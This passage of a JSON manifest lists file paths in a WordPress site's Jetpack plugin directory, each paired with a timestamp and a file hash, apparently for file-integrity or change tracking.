json\\/jetpack-fa_IR-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"ad8fdaa6f2a941871865c1096bb8129c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-en_ZA-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"c1541b9c3d740abffb9407ed36990da5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_AR-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"b8fc0863e3a0bb3a6d3f438953fb2b83\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-uk-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"4c582ae08f0556e74f43f749c20835a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-el-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"fb2d49b4f741668923c8ecf0c1c4981e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-es_PE-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"9c538f70fd782464efe4a92897a96c62\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-da_DK-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"b7cce9c03a2c30241d58cfb6b371c25f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-pl_PL-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"9a71ef29e06043583bb6bc47d59bc5e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sv_SE-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"915a8a82c65c75b03280e937c666966d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-ur-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"34c65f607e2c83011bea64ff3c4848e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sl_SI-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"bcc18fe74a65e10ad18fc684c596ab9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-sk_SK-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"4dbbf9ab4566dcdb1c2f0c87c3224309\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/json\\/jetpack-nl_NL-1bac79e646a8bf4081a5011ab72d5807.json\":{\"d\":1567815231,\"h\":\"f676fefa1b216bf53719231152b7dcba\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/languages\\/readme.txt\":{\"d\":1567815231,\"h\":\"502d5fcc18ed2c04176603dc616d2254\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-constants.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-settings.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-sender.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-callables.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-terms.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-server.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-queue.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-comments.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-simple-codec.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-users.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-themes.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-listener.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-stats.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-wp-super-cache.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-options.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-menus.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-wp-replicastore.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-plugins.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-json-deflate-array-codec.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-protect.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/interface.jetpack-sync-codec.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-import.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-actions.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-meta.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-updates.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-posts.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-network-options.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/interface.jetpack-sync-replicastore.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-functions.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-users.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-attachments.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-defaults.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-woocommerce.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-module-full-sync.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/sync\\/class.jetpack-sync-modules.php\":{\"d\":1567815231,\"h\":\"7a5d47c69a72f0d02edad660b9c31f95\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/installed.json\":{\"d\":1567815231,\"h\":\"51b408bccfb2e5321c466eaf018aeadf\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_static.php\":{\"d\":1567815231,\"h\":\"d90d95b651ae2784466300f9548c2774\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_classmap.php\":{\"d\":1567815231,\"h\":\"22505bf4decd21dc3769c6ea5e648d42\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_real.php\":{\"d\":1567815231,\"h\":\"dcee68f5e8bf88b77c31f7ca52413b71\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/ClassLoader.php\":{\"d\":1567815231,\"h\":\"a0899dd7d97c25fe1d872a542afa6081\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_files.php\":{\"d\":1567815231,\"h\":\"1a3c0313f9cb5a9d2df685c1c0b737b2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_psr4.php\":{\"d\":1567815231,\"h\":\"95052b6ebd426c5b38f6cb572f711ec8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_namespaces.php\":{\"d\":1567815231,\"h\":\"35e12c7d76c4a81633bcf547c0e229a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/autoload_classmap_package.php\":{\"d\":1567815231,\"h\":\"2c783c27ea82c8b59de60263736a5490\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/composer\\/LICENSE\":{\"d\":1567815231,\"h\":\"955d5fe58c231244f6b49000f383b5e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/legacy\\/load-ixr.php\":{\"d\":1567815231,\"h\":\"c1a35d601b5390d3f3da7d830f5ffe44\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/legacy\\/class.jetpack-xmlrpc-server.php\":{\"d\":1567815231,\"h\":\"0c10e13d20cf30ec565a181ee300ed07\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/legacy\\/class.jetpack-ixr-client-multicall.php\":{\"d\":1567815231,\"h\":\"bbbb29377f5f0cd25d607af13decef7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/legacy\\/class.jetpack-signature.php\":{\"d\":1567815231,\"h\":\"3603e133735ecc08f9cb710fc10fa8f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/legacy\\/class.jetpack-ixr-client.php\":{\"d\":1567815231,\"h\":\"14c9880b094038376787b0352f05d0fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/src\\/Client.php\":{\"d\":1567815231,\"h\":\"5b78928f99553debdd3f8ae3b592b235\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/src\\/XMLRPC_Connector.php\":{\"d\":1567815231,\"h\":\"8f3029e82652a854382644e7dd610bac\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/src\\/REST_Connector.php\":{\"d\":1567815231,\"h\":\"9ee9efd3c34cedeeebab77865332d312\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/src\\/Manager_Interface.php\":{\"d\":1567815231,\"h\":\"3ca94b0d400f94790df565b7160d8ebb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-connection\\/src\\/Manager.php\":{\"d\":1567815231,\"h\":\"843f31efb06bc43095482af2eece13f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-roles\\/src\\/Roles.php\":{\"d\":1567815231,\"h\":\"a60f20b9092e3ea749e0f35dbf2d1d94\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-status\\/src\\/Status.php\":{\"d\":1567815231,\"h\":\"dc6c62eb979ed952b2e563a68211ca77\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/legacy\\/class.jetpack-tracks.php\":{\"d\":1567815231,\"h\":\"abb7b1929d9c4a620ce22c4e97eae2aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/legacy\\/class.jetpack-sync-settings.php\":{\"d\":1567815231,\"h\":\"e8ad7c7c59d2d7d88ea75f0376e615f5\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/legacy\\/class.jetpack-sync-actions.php\":{\"d\":1567815231,\"h\":\"210bdc6386e116fd2dc29f26d4568f55\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/legacy\\/class.jetpack-client.php\":{\"d\":1567815231,\"h\":\"e297daf68734e65dc378659e6042f457\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/legacy\\/class.jetpack-sync-modules.php\":{\"d\":1567815231,\"h\":\"a65f1ac75d49901ea514b8a199785a46\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/lib\\/tracks\\/client.php\":{\"d\":1567815231,\"h\":\"02d9005dede70c2c62205f18276d0d9d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-compat\\/functions.php\":{\"d\":1567815231,\"h\":\"eb14c5978052866a639de4f3e4ef2e11\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-options\\/legacy\\/class.jetpack-options.php\":{\"d\":1567815231,\"h\":\"b9d3f461e17a819d8ce28000b47806f1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-assets\\/src\\/Assets.php\":{\"d\":1567815231,\"h\":\"4e43640548b29a195d1dedbc1aabbf63\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-jitm\\/assets\\/jetpack-admin-jitm.min.css\":{\"d\":1567815231,\"h\":\"6ed221f70790579c8b90a277b7e41d9b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-jitm\\/assets\\/jetpack-admin-jitm-rtl.min.css\":{\"d\":1567815231,\"h\":\"0838ea0825955b4617973a1e239b499b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-jitm\\/assets\\/jetpack-admin-jitm.css\":{\"d\":1567815231,\"h\":\"7841d5a12766da23f02d9934005fca1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-jitm\\/assets\\/jetpack-admin-jitm-rtl.css\":{\"d\":1567815231,\"h\":\"b16e6b68c4d8dc1f711fc7d74083a216\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-jitm\\/src\\/JITM.php\":{\"d\":1567815231,\"h\":\"b8c4a86a7836162609c825e9511af84b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-abtest\\/src\\/Abtest.php\":{\"d\":1567815231,\"h\":\"075a0be249638d34ef22d45f4b580b58\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-tracking\\/legacy\\/class.tracks-client.php\":{\"d\":1567815231,\"h\":\"8a5d4575dc810964ade9582c3bebdbca\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-tracking\\/legacy\\/class.tracks-event.php\":{\"d\":1567815231,\"h\":\"097df876f02987e8f71d3d66b2977d92\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-tracking\\/src\\/Tracking.php\":{\"d\":1567815231,\"h\":\"7918e2afe8c1880f2f045be1cee102c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-error\\/src\\/Error.php\":{\"d\":1567815231,\"h\":\"bd3ace3ebcf4813a57936ddced61db1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/WooCommerce.php\":{\"d\":1567815231,\"h\":\"544f82b994de8c0cbbf3c3bfdf1c6215\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Comments.php\":{\"d\":1567815231,\"h\":\"d1ae1fec67fdbde2fc9747656d871b9c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Posts.php\":{\"d\":1567815231,\"h\":\"7b1821f136b494927fcdd380cb409a23\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Protect.php\":{\"d\":1567815231,\"h\":\"05941802a74f06cbc365e798b0c623b4\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Terms.php\":{\"d\":1567815231,\"h\":\"40d433887da3920913ce4f6262dc0abc\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Import.php\":{\"d\":1567815231,\"h\":\"ba6cb2dba781585ef6b16abb4c486e0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Themes.php\":{\"d\":1567815231,\"h\":\"98b2bf650c33b5275eb4eadfefa2e0c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/WP_Super_Cache.php\":{\"d\":1567815231,\"h\":\"8d94c30a28a955dadbb9158a077a07ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Stats.php\":{\"d\":1567815231,\"h\":\"333c2d6b375d36241b869e39295ec0bb\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Attachments.php\":{\"d\":1567815231,\"h\":\"eea118f1b38547f743a16209b99dd715\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Menus.php\":{\"d\":1567815231,\"h\":\"e41c3f33d34f24422e6fc532f95601be\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Constants.php\":{\"d\":1567815231,\"h\":\"e875e343d9fbc2468f32c0f1ea7a78e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Plugins.php\":{\"d\":1567815231,\"h\":\"e8f91ffddf024972ae492e7256f5f5c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Network_Options.php\":{\"d\":1567815231,\"h\":\"b5fbcf97e2ea54e05ad0cec40a748051\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Term_Relationships.php\":{\"d\":1567815231,\"h\":\"5ebb26f551b3cc0b58146ae45eed1779\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Full_Sync.php\":{\"d\":1567815231,\"h\":\"176c17c954fbd2881b8a743a46f35a37\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Callables.php\":{\"d\":1567815231,\"h\":\"c1d2a8d30359498a4dec1c4034cf1605\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Options.php\":{\"d\":1567815231,\"h\":\"dc65d504de7744afe4a690da1e9d6622\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Module.php\":{\"d\":1567815231,\"h\":\"f301ca1065cde15be0f41eb08802dd7b\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Updates.php\":{\"d\":1567815231,\"h\":\"7cafb9efb814f84cc3e2bf77fc33874e\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Meta.php\":{\"d\":1567815231,\"h\":\"15a1c508a67b4f7e9cbfa519e7adc92d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/modules\\/Users.php\":{\"d\":1567815231,\"h\":\"eb60609e2dd17c21b4423d919b6c6c15\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Server.php\":{\"d\":1567815231,\"h\":\"fd113f8c63ed932bc6baee7203f4375d\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Queue_Buffer.php\":{\"d\":1567815231,\"h\":\"d0c068265da475e9400833f2268c5df6\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Modules.php\":{\"d\":1567815231,\"h\":\"50eb3b8c0de4be186899989b81f56c36\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Codec_Interface.php\":{\"d\":1567815231,\"h\":\"4099422f97da5f56548b98a8eea0e8a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Listener.php\":{\"d\":1567815231,\"h\":\"de2a05b6856d2e5cb2fe748772bb4b6c\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Simple_Codec.php\":{\"d\":1567815231,\"h\":\"918c4a1b3a9fa540c9f2307679540623\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Actions.php\":{\"d\":1567815231,\"h\":\"d047df993bb126b4beea638c1be0e624\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\\/automattic\\/jetpack-sync\\/src\\/Queue.php\":{\"d\":1567815231,\"h\":\"4e2718144bc8e8613f639c4b97439338\"},\"\\/home2\\/zphiblgz\\/public_html\\/members\\/wp-content\\/plugins\\/jetpack\\/vendor\